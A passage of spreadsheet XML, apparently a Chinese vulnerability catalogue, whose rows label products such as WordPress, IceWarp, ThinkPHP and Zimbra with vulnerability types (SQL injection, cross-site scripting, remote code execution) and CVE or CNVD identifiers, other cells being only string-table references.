    <row r="70" s="4" customFormat="1" spans="1:6">
      <c r="A70" s="2" t="s">
        <v>241</v>
      </c>
      <c r="B70" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C70" s="2"/>
      <c r="D70" s="2" t="str">
        <f t="shared" si="1"/>
        <v>泛微_SQL注入</v>
      </c>
      <c r="E70" s="6" t="s">
        <v>242</v>
      </c>
      <c r="F70" s="4" t="s">
        <v>243</v>
      </c>
    </row>
    <row r="71" s="4" customFormat="1" spans="1:6">
      <c r="A71" s="2" t="s">
        <v>241</v>
      </c>
      <c r="B71" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C71" s="2"/>
      <c r="D71" s="2" t="str">
        <f t="shared" si="1"/>
        <v>泛微_SQL注入</v>
      </c>
      <c r="E71" s="6" t="s">
        <v>244</v>
      </c>
      <c r="F71" s="4" t="s">
        <v>245</v>
      </c>
    </row>
    <row r="72" s="4" customFormat="1" spans="1:6">
      <c r="A72" s="2" t="s">
        <v>241</v>
      </c>
      <c r="B72" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C72" s="2"/>
      <c r="D72" s="2" t="str">
        <f t="shared" si="1"/>
        <v>泛微_SQL注入</v>
      </c>
      <c r="E72" s="6" t="s">
        <v>246</v>
      </c>
      <c r="F72" s="4" t="s">
        <v>247</v>
      </c>
    </row>
    <row r="73" s="4" customFormat="1" spans="1:6">
      <c r="A73" s="2" t="s">
        <v>248</v>
      </c>
      <c r="B73" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C73" s="2"/>
      <c r="D73" s="2" t="str">
        <f t="shared" si="1"/>
        <v>用友_SQL注入</v>
      </c>
      <c r="E73" s="6" t="s">
        <v>249</v>
      </c>
      <c r="F73" s="4" t="s">
        <v>250</v>
      </c>
    </row>
    <row r="74" s="4" customFormat="1" spans="1:6">
      <c r="A74" s="2" t="s">
        <v>248</v>
      </c>
      <c r="B74" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C74" s="2"/>
      <c r="D74" s="2" t="str">
        <f t="shared" si="1"/>
        <v>用友_SQL注入</v>
      </c>
      <c r="E74" s="6" t="s">
        <v>251</v>
      </c>
      <c r="F74" s="4" t="s">
        <v>252</v>
      </c>
    </row>
    <row r="75" s="4" customFormat="1" spans="1:6">
      <c r="A75" s="2" t="s">
        <v>248</v>
      </c>
      <c r="B75" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C75" s="2"/>
      <c r="D75" s="2" t="str">
        <f t="shared" si="1"/>
        <v>用友_SQL注入</v>
      </c>
      <c r="E75" s="6" t="s">
        <v>253</v>
      </c>
      <c r="F75" s="4" t="s">
        <v>254</v>
      </c>
    </row>
    <row r="76" s="4" customFormat="1" spans="1:6">
      <c r="A76" s="2" t="s">
        <v>255</v>
      </c>
      <c r="B76" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C76" s="2" t="s">
        <v>256</v>
      </c>
      <c r="D76" s="2" t="str">
        <f t="shared" si="1"/>
        <v>SolarWinds Orion_SQL注入</v>
      </c>
      <c r="E76" s="6" t="s">
        <v>257</v>
      </c>
      <c r="F76" s="4" t="s">
        <v>258</v>
      </c>
    </row>
    <row r="77" s="4" customFormat="1" spans="1:6">
      <c r="A77" s="2" t="s">
        <v>259</v>
      </c>
      <c r="B77" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C77" s="2" t="s">
        <v>261</v>
      </c>
      <c r="D77" s="2" t="str">
        <f t="shared" si="1"/>
        <v>FortiWeb_跨站脚本_CVE-2021-22122</v>
      </c>
      <c r="E77" s="6" t="s">
        <v>262</v>
      </c>
      <c r="F77" s="4" t="s">
        <v>263</v>
      </c>
    </row>
    <row r="78" s="4" customFormat="1" spans="1:6">
      <c r="A78" s="2" t="s">
        <v>264</v>
      </c>
      <c r="B78" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C78" s="2" t="s">
        <v>265</v>
      </c>
      <c r="D78" s="2" t="str">
        <f t="shared" si="1"/>
        <v>Helmet Store Showroom_跨站脚本_CVE-2022-46073</v>
      </c>
      <c r="E78" s="6" t="s">
        <v>266</v>
      </c>
      <c r="F78" s="4" t="s">
        <v>267</v>
      </c>
    </row>
    <row r="79" s="4" customFormat="1" spans="1:6">
      <c r="A79" s="2" t="s">
        <v>268</v>
      </c>
      <c r="B79" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C79" s="2" t="s">
        <v>269</v>
      </c>
      <c r="D79" s="2" t="str">
        <f t="shared" si="1"/>
        <v>ReQlogic_跨站脚本_CVE-2022-41441</v>
      </c>
      <c r="E79" s="6" t="s">
        <v>270</v>
      </c>
      <c r="F79" s="4" t="s">
        <v>271</v>
      </c>
    </row>
    <row r="80" s="4" customFormat="1" spans="1:6">
      <c r="A80" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B80" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C80" s="2" t="s">
        <v>272</v>
      </c>
      <c r="D80" s="2" t="str">
        <f t="shared" si="1"/>
        <v>WordPress_跨站脚本_CVE-2022-1933</v>
      </c>
      <c r="E80" s="6" t="s">
        <v>273</v>
      </c>
      <c r="F80" s="4" t="s">
        <v>274</v>
      </c>
    </row>
    <row r="81" s="4" customFormat="1" spans="1:6">
      <c r="A81" s="2" t="s">
        <v>275</v>
      </c>
      <c r="B81" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C81" s="2" t="s">
        <v>276</v>
      </c>
      <c r="D81" s="2" t="str">
        <f t="shared" si="1"/>
        <v>Zimbra Collaboration (ZCS)_跨站脚本_CVE-2022-27926</v>
      </c>
      <c r="E81" s="6" t="s">
        <v>277</v>
      </c>
      <c r="F81" s="4" t="s">
        <v>278</v>
      </c>
    </row>
    <row r="82" s="4" customFormat="1" spans="1:6">
      <c r="A82" s="2" t="s">
        <v>279</v>
      </c>
      <c r="B82" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C82" s="2" t="s">
        <v>280</v>
      </c>
      <c r="D82" s="2" t="str">
        <f t="shared" si="1"/>
        <v>CopyParty_跨站脚本_CVE-2023-38501</v>
      </c>
      <c r="E82" s="6" t="s">
        <v>281</v>
      </c>
      <c r="F82" s="4" t="s">
        <v>282</v>
      </c>
    </row>
    <row r="83" s="4" customFormat="1" spans="1:6">
      <c r="A83" s="2" t="s">
        <v>283</v>
      </c>
      <c r="B83" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C83" s="2" t="s">
        <v>284</v>
      </c>
      <c r="D83" s="2" t="str">
        <f t="shared" si="1"/>
        <v>IceWarp_跨站脚本_CVE-2023-39598</v>
      </c>
      <c r="E83" s="6" t="s">
        <v>285</v>
      </c>
      <c r="F83" s="4" t="s">
        <v>286</v>
      </c>
    </row>
    <row r="84" s="4" customFormat="1" spans="1:6">
      <c r="A84" s="2" t="s">
        <v>283</v>
      </c>
      <c r="B84" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C84" s="2" t="s">
        <v>287</v>
      </c>
      <c r="D84" s="2" t="str">
        <f t="shared" si="1"/>
        <v>IceWarp_跨站脚本_CVE-2023-37728</v>
      </c>
      <c r="E84" s="6" t="s">
        <v>288</v>
      </c>
      <c r="F84" s="4" t="s">
        <v>289</v>
      </c>
    </row>
    <row r="85" s="4" customFormat="1" spans="1:6">
      <c r="A85" s="2" t="s">
        <v>290</v>
      </c>
      <c r="B85" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C85" s="2" t="s">
        <v>291</v>
      </c>
      <c r="D85" s="2" t="str">
        <f t="shared" si="1"/>
        <v>Imgproxy_跨站脚本_CVE-2023-1496</v>
      </c>
      <c r="E85" s="6" t="s">
        <v>292</v>
      </c>
      <c r="F85" s="4" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="86" s="4" customFormat="1" spans="1:6">
      <c r="A86" s="2" t="s">
        <v>294</v>
      </c>
      <c r="B86" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C86" s="2" t="s">
        <v>295</v>
      </c>
      <c r="D86" s="2" t="str">
        <f t="shared" si="1"/>
        <v>OURPHP_跨站脚本_CVE-2023-30210</v>
      </c>
      <c r="E86" s="6" t="s">
        <v>296</v>
      </c>
      <c r="F86" s="4" t="s">
        <v>297</v>
      </c>
    </row>
    <row r="87" s="4" customFormat="1" spans="1:6">
      <c r="A87" s="2" t="s">
        <v>135</v>
      </c>
      <c r="B87" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C87" s="2" t="s">
        <v>298</v>
      </c>
      <c r="D87" s="2" t="str">
        <f t="shared" si="1"/>
        <v>PHPJabbers_跨站脚本_CVE-2023-4114</v>
      </c>
      <c r="E87" s="6" t="s">
        <v>299</v>
      </c>
      <c r="F87" s="4" t="s">
        <v>300</v>
      </c>
    </row>
    <row r="88" s="4" customFormat="1" spans="1:6">
      <c r="A88" s="2" t="s">
        <v>135</v>
      </c>
      <c r="B88" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C88" s="2" t="s">
        <v>301</v>
      </c>
      <c r="D88" s="2" t="str">
        <f t="shared" si="1"/>
        <v>PHPJabbers_跨站脚本_CVE-2023-4113</v>
      </c>
      <c r="E88" s="6" t="s">
        <v>302</v>
      </c>
      <c r="F88" s="4" t="s">
        <v>303</v>
      </c>
    </row>
    <row r="89" s="4" customFormat="1" spans="1:6">
      <c r="A89" s="2" t="s">
        <v>135</v>
      </c>
      <c r="B89" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C89" s="2" t="s">
        <v>304</v>
      </c>
      <c r="D89" s="2" t="str">
        <f t="shared" si="1"/>
        <v>PHPJabbers_跨站脚本_CVE-2023-4112</v>
      </c>
      <c r="E89" s="6" t="s">
        <v>305</v>
      </c>
      <c r="F89" s="4" t="s">
        <v>306</v>
      </c>
    </row>
    <row r="90" s="4" customFormat="1" spans="1:6">
      <c r="A90" s="2" t="s">
        <v>135</v>
      </c>
      <c r="B90" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C90" s="2" t="s">
        <v>307</v>
      </c>
      <c r="D90" s="2" t="str">
        <f t="shared" si="1"/>
        <v>PHPJabbers_跨站脚本_CVE-2023-4116</v>
      </c>
      <c r="E90" s="6" t="s">
        <v>308</v>
      </c>
      <c r="F90" s="4" t="s">
        <v>309</v>
      </c>
    </row>
    <row r="91" s="4" customFormat="1" spans="1:6">
      <c r="A91" s="2" t="s">
        <v>104</v>
      </c>
      <c r="B91" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C91" s="2" t="s">
        <v>310</v>
      </c>
      <c r="D91" s="2" t="str">
        <f t="shared" si="1"/>
        <v>PrestaShop_跨站脚本_CVE-2023-39676</v>
      </c>
      <c r="E91" s="6" t="s">
        <v>311</v>
      </c>
      <c r="F91" s="4" t="s">
        <v>312</v>
      </c>
    </row>
    <row r="92" s="4" customFormat="1" spans="1:6">
      <c r="A92" s="2" t="s">
        <v>313</v>
      </c>
      <c r="B92" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C92" s="2" t="s">
        <v>314</v>
      </c>
      <c r="D92" s="2" t="str">
        <f t="shared" si="1"/>
        <v>ShortPixel Adaptive Images_跨站脚本_CVE-2023-0334</v>
      </c>
      <c r="E92" s="6" t="s">
        <v>315</v>
      </c>
      <c r="F92" s="4" t="s">
        <v>316</v>
      </c>
    </row>
    <row r="93" s="4" customFormat="1" spans="1:6">
      <c r="A93" s="2" t="s">
        <v>317</v>
      </c>
      <c r="B93" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C93" s="2" t="s">
        <v>318</v>
      </c>
      <c r="D93" s="2" t="str">
        <f t="shared" si="1"/>
        <v>mooSocial_跨站脚本_CVE-2023-4174</v>
      </c>
      <c r="E93" s="6" t="s">
        <v>319</v>
      </c>
      <c r="F93" s="4" t="s">
        <v>320</v>
      </c>
    </row>
    <row r="94" s="4" customFormat="1" spans="1:6">
      <c r="A94" s="2" t="s">
        <v>321</v>
      </c>
      <c r="B94" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C94" s="2" t="s">
        <v>322</v>
      </c>
      <c r="D94" s="2" t="str">
        <f t="shared" si="1"/>
        <v>Calibre_跨站脚本_CVE-2024-7008</v>
      </c>
      <c r="E94" s="6" t="s">
        <v>323</v>
      </c>
      <c r="F94" s="4" t="s">
        <v>324</v>
      </c>
    </row>
    <row r="95" s="4" customFormat="1" spans="1:6">
      <c r="A95" s="2" t="s">
        <v>325</v>
      </c>
      <c r="B95" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C95" s="2" t="s">
        <v>326</v>
      </c>
      <c r="D95" s="2" t="str">
        <f t="shared" si="1"/>
        <v>Journyx_跨站脚本_CVE-2024-6892</v>
      </c>
      <c r="E95" s="6" t="s">
        <v>327</v>
      </c>
      <c r="F95" s="4" t="s">
        <v>328</v>
      </c>
    </row>
    <row r="96" s="4" customFormat="1" spans="1:6">
      <c r="A96" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B96" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C96" s="2" t="s">
        <v>329</v>
      </c>
      <c r="D96" s="2" t="str">
        <f t="shared" si="1"/>
        <v>Joomla_跨站脚本_CVE-2025-2127</v>
      </c>
      <c r="E96" s="6" t="s">
        <v>330</v>
      </c>
      <c r="F96" s="4" t="s">
        <v>331</v>
      </c>
    </row>
    <row r="97" s="4" customFormat="1" spans="1:6">
      <c r="A97" s="2" t="s">
        <v>211</v>
      </c>
      <c r="B97" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C97" s="2"/>
      <c r="D97" s="2" t="str">
        <f t="shared" si="1"/>
        <v>Phuket SolutionCMS_跨站脚本</v>
      </c>
      <c r="E97" s="6" t="s">
        <v>332</v>
      </c>
      <c r="F97" s="4" t="s">
        <v>333</v>
      </c>
    </row>
    <row r="98" s="4" customFormat="1" spans="1:6">
      <c r="A98" s="2" t="s">
        <v>334</v>
      </c>
      <c r="B98" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C98" s="2"/>
      <c r="D98" s="2" t="str">
        <f t="shared" si="1"/>
        <v>RentEquip Multipurpose Rental_跨站脚本</v>
      </c>
      <c r="E98" s="6" t="s">
        <v>335</v>
      </c>
      <c r="F98" s="4" t="s">
        <v>336</v>
      </c>
    </row>
    <row r="99" s="4" customFormat="1" spans="1:6">
      <c r="A99" s="2" t="s">
        <v>337</v>
      </c>
      <c r="B99" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C99" s="2"/>
      <c r="D99" s="2" t="str">
        <f t="shared" si="1"/>
        <v>Senayan Library Management System (SLIMS )_跨站脚本</v>
      </c>
      <c r="E99" s="6" t="s">
        <v>338</v>
      </c>
      <c r="F99" s="4" t="s">
        <v>339</v>
      </c>
    </row>
    <row r="100" s="4" customFormat="1" spans="1:6">
      <c r="A100" s="2" t="s">
        <v>340</v>
      </c>
      <c r="B100" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C100" s="2"/>
      <c r="D100" s="2" t="str">
        <f t="shared" si="1"/>
        <v>Tiki WikiCMS_跨站脚本</v>
      </c>
      <c r="E100" s="6" t="s">
        <v>341</v>
      </c>
      <c r="F100" s="4" t="s">
        <v>342</v>
      </c>
    </row>
    <row r="101" s="4" customFormat="1" spans="1:6">
      <c r="A101" s="2" t="s">
        <v>343</v>
      </c>
      <c r="B101" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C101" s="2"/>
      <c r="D101" s="2" t="str">
        <f t="shared" si="1"/>
        <v>VMware_跨站脚本</v>
      </c>
      <c r="E101" s="6" t="s">
        <v>344</v>
      </c>
      <c r="F101" s="4" t="s">
        <v>345</v>
      </c>
    </row>
    <row r="102" s="4" customFormat="1" spans="1:6">
      <c r="A102" s="2" t="s">
        <v>346</v>
      </c>
      <c r="B102" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C102" s="2" t="s">
        <v>347</v>
      </c>
      <c r="D102" s="2" t="str">
        <f t="shared" si="1"/>
        <v>Oracle Fusion Middleware WebCenter Sites_跨站脚本_CVE-2018-2791</v>
      </c>
      <c r="E102" s="6" t="s">
        <v>348</v>
      </c>
      <c r="F102" s="4" t="s">
        <v>349</v>
      </c>
    </row>
    <row r="103" s="4" customFormat="1" spans="1:6">
      <c r="A103" s="2" t="s">
        <v>350</v>
      </c>
      <c r="B103" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C103" s="2" t="s">
        <v>351</v>
      </c>
      <c r="D103" s="2" t="str">
        <f t="shared" si="1"/>
        <v>McAfee ePolicy Orchestrator_跨站脚本_CVE-2020-7318</v>
      </c>
      <c r="E103" s="6" t="s">
        <v>352</v>
      </c>
      <c r="F103" s="4" t="s">
        <v>353</v>
      </c>
    </row>
    <row r="104" s="4" customFormat="1" spans="1:6">
      <c r="A104" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B104" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C104" s="2" t="s">
        <v>354</v>
      </c>
      <c r="D104" s="2" t="str">
        <f t="shared" si="1"/>
        <v>WordPress_跨站脚本_CVE-2020-29395</v>
      </c>
      <c r="E104" s="6" t="s">
        <v>355</v>
      </c>
      <c r="F104" s="4" t="s">
        <v>356</v>
      </c>
    </row>
    <row r="105" s="4" customFormat="1" spans="1:6">
      <c r="A105" s="2" t="s">
        <v>357</v>
      </c>
      <c r="B105" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C105" s="2" t="s">
        <v>358</v>
      </c>
      <c r="D105" s="2" t="str">
        <f t="shared" si="1"/>
        <v>Aruba Instant Access Point (IAP)_跨站脚本_CVE-2021-25161</v>
      </c>
      <c r="E105" s="6" t="s">
        <v>359</v>
      </c>
      <c r="F105" s="4" t="s">
        <v>360</v>
      </c>
    </row>
    <row r="106" s="4" customFormat="1" spans="1:6">
      <c r="A106" s="2" t="s">
        <v>361</v>
      </c>
      <c r="B106" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C106" s="2" t="s">
        <v>362</v>
      </c>
      <c r="D106" s="2" t="str">
        <f t="shared" si="1"/>
        <v>IRTS OP Monitor_跨站脚本_CVE-2021-40272</v>
      </c>
      <c r="E106" s="6" t="s">
        <v>363</v>
      </c>
      <c r="F106" s="4" t="s">
        <v>364</v>
      </c>
    </row>
    <row r="107" s="4" customFormat="1" spans="1:6">
      <c r="A107" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B107" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C107" s="2" t="s">
        <v>365</v>
      </c>
      <c r="D107" s="2" t="str">
        <f t="shared" si="1"/>
        <v>WordPress_跨站脚本_CVE-2021-24498</v>
      </c>
      <c r="E107" s="6" t="s">
        <v>366</v>
      </c>
      <c r="F107" s="4" t="s">
        <v>367</v>
      </c>
    </row>
    <row r="108" s="4" customFormat="1" spans="1:6">
      <c r="A108" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B108" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C108" s="2" t="s">
        <v>368</v>
      </c>
      <c r="D108" s="2" t="str">
        <f t="shared" si="1"/>
        <v>WordPress_跨站脚本_CVE-2021-24364</v>
      </c>
      <c r="E108" s="6" t="s">
        <v>369</v>
      </c>
      <c r="F108" s="4" t="s">
        <v>370</v>
      </c>
    </row>
    <row r="109" s="4" customFormat="1" spans="1:6">
      <c r="A109" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B109" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C109" s="2" t="s">
        <v>371</v>
      </c>
      <c r="D109" s="2" t="str">
        <f t="shared" si="1"/>
        <v>WordPress_跨站脚本_CVE-2021-24387</v>
      </c>
      <c r="E109" s="6" t="s">
        <v>372</v>
      </c>
      <c r="F109" s="4" t="s">
        <v>373</v>
      </c>
    </row>
    <row r="110" s="4" customFormat="1" spans="1:6">
      <c r="A110" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B110" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C110" s="2" t="s">
        <v>374</v>
      </c>
      <c r="D110" s="2" t="str">
        <f t="shared" si="1"/>
        <v>WordPress_跨站脚本_CVE-2021-24274</v>
      </c>
      <c r="E110" s="6" t="s">
        <v>375</v>
      </c>
      <c r="F110" s="4" t="s">
        <v>376</v>
      </c>
    </row>
    <row r="111" s="4" customFormat="1" spans="1:6">
      <c r="A111" s="2" t="s">
        <v>377</v>
      </c>
      <c r="B111" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C111" s="2" t="s">
        <v>378</v>
      </c>
      <c r="D111" s="2" t="str">
        <f t="shared" si="1"/>
        <v>npm ansi_up_跨站脚本_CVE-2021-3377</v>
      </c>
      <c r="E111" s="6" t="s">
        <v>379</v>
      </c>
      <c r="F111" s="4" t="s">
        <v>380</v>
      </c>
    </row>
    <row r="112" s="4" customFormat="1" spans="1:6">
      <c r="A112" s="2" t="s">
        <v>381</v>
      </c>
      <c r="B112" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C112" s="2" t="s">
        <v>382</v>
      </c>
      <c r="D112" s="2" t="str">
        <f t="shared" si="1"/>
        <v>SmarterTools SmarterTrack_跨站脚本_CVE-2022-24384</v>
      </c>
      <c r="E112" s="6" t="s">
        <v>383</v>
      </c>
      <c r="F112" s="4" t="s">
        <v>384</v>
      </c>
    </row>
    <row r="113" s="4" customFormat="1" spans="1:6">
      <c r="A113" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B113" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C113" s="2" t="s">
        <v>385</v>
      </c>
      <c r="D113" s="2" t="str">
        <f t="shared" si="1"/>
        <v>WordPress_跨站脚本_CVE-2022-1906</v>
      </c>
      <c r="E113" s="6" t="s">
        <v>386</v>
      </c>
      <c r="F113" s="4" t="s">
        <v>387</v>
      </c>
    </row>
    <row r="114" s="4" customFormat="1" spans="1:6">
      <c r="A114" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B114" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C114" s="2" t="s">
        <v>388</v>
      </c>
      <c r="D114" s="2" t="str">
        <f t="shared" si="1"/>
        <v>WordPress_跨站脚本_CVE-2022-0234</v>
      </c>
      <c r="E114" s="6" t="s">
        <v>389</v>
      </c>
      <c r="F114" s="4" t="s">
        <v>390</v>
      </c>
    </row>
    <row r="115" s="4" customFormat="1" spans="1:6">
      <c r="A115" s="2" t="s">
        <v>391</v>
      </c>
      <c r="B115" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C115" s="2" t="s">
        <v>392</v>
      </c>
      <c r="D115" s="2" t="str">
        <f t="shared" si="1"/>
        <v>CrafterCMS Engine_跨站脚本_CVE-2023-4136</v>
      </c>
      <c r="E115" s="6" t="s">
        <v>393</v>
      </c>
      <c r="F115" s="4" t="s">
        <v>394</v>
      </c>
    </row>
    <row r="116" s="4" customFormat="1" spans="1:6">
      <c r="A116" s="2" t="s">
        <v>395</v>
      </c>
      <c r="B116" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C116" s="2" t="s">
        <v>396</v>
      </c>
      <c r="D116" s="2" t="str">
        <f t="shared" si="1"/>
        <v>Emlog Pro_跨站脚本_CVE-2023-41621</v>
      </c>
      <c r="E116" s="6" t="s">
        <v>397</v>
      </c>
      <c r="F116" s="4" t="s">
        <v>398</v>
      </c>
    </row>
    <row r="117" s="4" customFormat="1" spans="1:6">
      <c r="A117" s="2" t="s">
        <v>399</v>
      </c>
      <c r="B117" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C117" s="2" t="s">
        <v>400</v>
      </c>
      <c r="D117" s="2" t="str">
        <f t="shared" si="1"/>
        <v>FOSSBilling_跨站脚本_CVE-2023-3521</v>
      </c>
      <c r="E117" s="6" t="s">
        <v>401</v>
      </c>
      <c r="F117" s="4" t="s">
        <v>402</v>
      </c>
    </row>
    <row r="118" s="4" customFormat="1" spans="1:6">
      <c r="A118" s="2" t="s">
        <v>283</v>
      </c>
      <c r="B118" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C118" s="2" t="s">
        <v>403</v>
      </c>
      <c r="D118" s="2" t="str">
        <f t="shared" si="1"/>
        <v>IceWarp_跨站脚本_CVE-2023-39700</v>
      </c>
      <c r="E118" s="6" t="s">
        <v>404</v>
      </c>
      <c r="F118" s="4" t="s">
        <v>405</v>
      </c>
    </row>
    <row r="119" s="4" customFormat="1" spans="1:6">
      <c r="A119" s="2" t="s">
        <v>406</v>
      </c>
      <c r="B119" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C119" s="2" t="s">
        <v>407</v>
      </c>
      <c r="D119" s="2" t="str">
        <f t="shared" si="1"/>
        <v>phpMyFAQ_跨站脚本_CVE-2023-5863</v>
      </c>
      <c r="E119" s="6" t="s">
        <v>408</v>
      </c>
      <c r="F119" s="4" t="s">
        <v>409</v>
      </c>
    </row>
    <row r="120" s="4" customFormat="1" spans="1:6">
      <c r="A120" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B120" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C120" s="2" t="s">
        <v>410</v>
      </c>
      <c r="D120" s="2" t="str">
        <f t="shared" si="1"/>
        <v>WordPress_跨站脚本_CVE-2023-2309</v>
      </c>
      <c r="E120" s="6" t="s">
        <v>411</v>
      </c>
      <c r="F120" s="4" t="s">
        <v>412</v>
      </c>
    </row>
    <row r="121" s="4" customFormat="1" spans="1:6">
      <c r="A121" s="2" t="s">
        <v>413</v>
      </c>
      <c r="B121" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C121" s="2" t="s">
        <v>414</v>
      </c>
      <c r="D121" s="2" t="str">
        <f t="shared" si="1"/>
        <v>Coda_跨站脚本_CVE-2024-28734</v>
      </c>
      <c r="E121" s="6" t="s">
        <v>415</v>
      </c>
      <c r="F121" s="4" t="s">
        <v>416</v>
      </c>
    </row>
    <row r="122" s="4" customFormat="1" spans="1:6">
      <c r="A122" s="2" t="s">
        <v>417</v>
      </c>
      <c r="B122" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C122" s="2" t="s">
        <v>418</v>
      </c>
      <c r="D122" s="2" t="str">
        <f t="shared" si="1"/>
        <v>Ganglia Web Interface_跨站脚本_CVE-2024-52762</v>
      </c>
      <c r="E122" s="6" t="s">
        <v>419</v>
      </c>
      <c r="F122" s="4" t="s">
        <v>420</v>
      </c>
    </row>
    <row r="123" s="4" customFormat="1" spans="1:6">
      <c r="A123" s="2" t="s">
        <v>421</v>
      </c>
      <c r="B123" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C123" s="2" t="s">
        <v>422</v>
      </c>
      <c r="D123" s="2" t="str">
        <f t="shared" si="1"/>
        <v>MailEnable Mail Service_跨站脚本_CVE-2025-44148</v>
      </c>
      <c r="E123" s="6" t="s">
        <v>423</v>
      </c>
      <c r="F123" s="4" t="s">
        <v>424</v>
      </c>
    </row>
    <row r="124" s="4" customFormat="1" spans="1:6">
      <c r="A124" s="2" t="s">
        <v>425</v>
      </c>
      <c r="B124" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C124" s="2" t="s">
        <v>256</v>
      </c>
      <c r="D124" s="2" t="str">
        <f t="shared" si="1"/>
        <v>GeoVision Geowebserver_跨站脚本</v>
      </c>
      <c r="E124" s="6" t="s">
        <v>426</v>
      </c>
      <c r="F124" s="4" t="s">
        <v>427</v>
      </c>
    </row>
    <row r="125" s="4" customFormat="1" spans="1:6">
      <c r="A125" s="2" t="s">
        <v>428</v>
      </c>
      <c r="B125" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C125" s="2" t="s">
        <v>256</v>
      </c>
      <c r="D125" s="2" t="str">
        <f t="shared" si="1"/>
        <v>Nginx_跨站脚本</v>
      </c>
      <c r="E125" s="6" t="s">
        <v>429</v>
      </c>
      <c r="F125" s="4" t="s">
        <v>430</v>
      </c>
    </row>
    <row r="126" s="4" customFormat="1" spans="1:6">
      <c r="A126" s="2" t="s">
        <v>431</v>
      </c>
      <c r="B126" s="2" t="s">
        <v>260</v>
      </c>
      <c r="C126" s="2" t="s">
        <v>256</v>
      </c>
      <c r="D126" s="2" t="str">
        <f t="shared" si="1"/>
        <v>Readymade Unilevel Ecommerce_跨站脚本</v>
      </c>
      <c r="E126" s="6" t="s">
        <v>432</v>
      </c>
      <c r="F126" s="4" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="127" s="4" customFormat="1" spans="1:6">
      <c r="A127" s="2" t="s">
        <v>434</v>
      </c>
      <c r="B127" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C127" s="2" t="s">
        <v>436</v>
      </c>
      <c r="D127" s="2" t="str">
        <f t="shared" si="1"/>
        <v>ThinkPHP_远程代码执行_CNVD-2022-86535</v>
      </c>
      <c r="E127" s="6" t="s">
        <v>437</v>
      </c>
      <c r="F127" s="4" t="s">
        <v>438</v>
      </c>
    </row>
    <row r="128" s="4" customFormat="1" spans="1:6">
      <c r="A128" s="2" t="s">
        <v>439</v>
      </c>
      <c r="B128" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C128" s="2" t="s">
        <v>440</v>
      </c>
      <c r="D128" s="2" t="str">
        <f t="shared" si="1"/>
        <v>ZeroShell_远程代码执行_CVE-2009-0545</v>
      </c>
      <c r="E128" s="6" t="s">
        <v>441</v>
      </c>
      <c r="F128" s="4" t="s">
        <v>442</v>
      </c>
    </row>
    <row r="129" s="4" customFormat="1" spans="1:6">
      <c r="A129" s="2" t="s">
        <v>443</v>
      </c>
      <c r="B129" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C129" s="2" t="s">
        <v>444</v>
      </c>
      <c r="D129" s="2" t="str">
        <f t="shared" si="1"/>
        <v>Apache_远程代码执行_CVE-2012-0392</v>
      </c>
      <c r="E129" s="6" t="s">
        <v>445</v>
      </c>
      <c r="F129" s="4" t="s">
        <v>446</v>
      </c>
    </row>
